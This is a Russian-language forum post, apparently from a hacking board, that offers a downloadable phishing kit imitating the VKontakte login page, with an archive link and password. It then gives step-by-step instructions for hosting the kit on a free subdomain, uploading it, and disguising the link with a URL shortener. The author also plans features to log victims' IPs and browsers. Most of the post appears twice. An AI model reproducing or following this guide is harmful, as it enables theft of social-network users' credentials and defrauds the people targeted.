Всем привет!!! Я на днях создал фишинг новой версии сайта ВКонтакте, вот что у меня получилось:
Скачивайте фишинг тут: https://mega.nz/#!eZVGSaTB!l8L1YGuV6vMYPDce7k3erAwVXUpY454jk38ilq7R88s
Пароль от архива: 12345
Так теперь собственно о маскировке:
1. Регистрируемся на хостинге: hostinger.ru (К сожалению за пользование хостингом придется заплатить около 50 руб.)
2. Выбираем в меню "Хостинг → Новый аккаунт" :
3. Выбираем тарифный план "Бесплатный"
4. ОБЯЗАТЕЛЬНО выбираем субдомен ".16mb.com" Должно получится так: вашадрес.16mb.com
5. Завершайте регистрацию аккаунта
6. Заливаем фишинг например через FileZilla
Вот и все фишинг скрыт и готов к работе.
Думаю, о том как пользоваться рассказывать не надо.
Не забудьте сократить через vk.cc
P.S. Планирую дорабатывать его. Хочу создать админ панель для проверки логинов и паролей. Добавит проверку введеных данных (если не правильно введен пароль или логин то войти не получится). А так же хочу прокачать login.php (что бы сохранял IP жертвы, браузер, отправлял оповещение о пополнении базы на электронную почту и многое другое). Остались вопросы пишите мне.
Скачивайте фишинг тут: https://mega.nz/#!eZVGSaTB!l8L1YGuV6vMYPDce7k3erAwVXUpY454jk38ilq7R88s
Пароль от архива: 12345
Так теперь собственно о маскировке:
1. Регистрируемся на хостинге: hostinger.ru (К сожалению за пользование хостингом придется заплатить около 50 руб.)
2. Выбираем в меню "Хостинг → Новый аккаунт" :
3. Выбираем тарифный план "Бесплатный"
4. ОБЯЗАТЕЛЬНО выбираем субдомен ".16mb.com" Должно получится так: вашадрес.16mb.com
5. Завершайте регистрацию аккаунта
6. Заливаем фишинг например через FileZilla
Вот и все фишинг скрыт и готов к работе.
Думаю, о том как пользоваться рассказывать не надо.
Не забудьте сократить через vk.cc
P.S. Планирую дорабатывать его. Хочу создать админ панель для проверки логинов и паролей. Добавит проверку введеных данных (если не правильно введен пароль или логин то войти не получится). А так же хочу прокачать login.php (что бы сохранял IP жертвы, браузер, отправлял оповещение о пополнении базы на электронную почту и многое другое). Остались вопросы пишите мне.
Последнее редактирование модератором: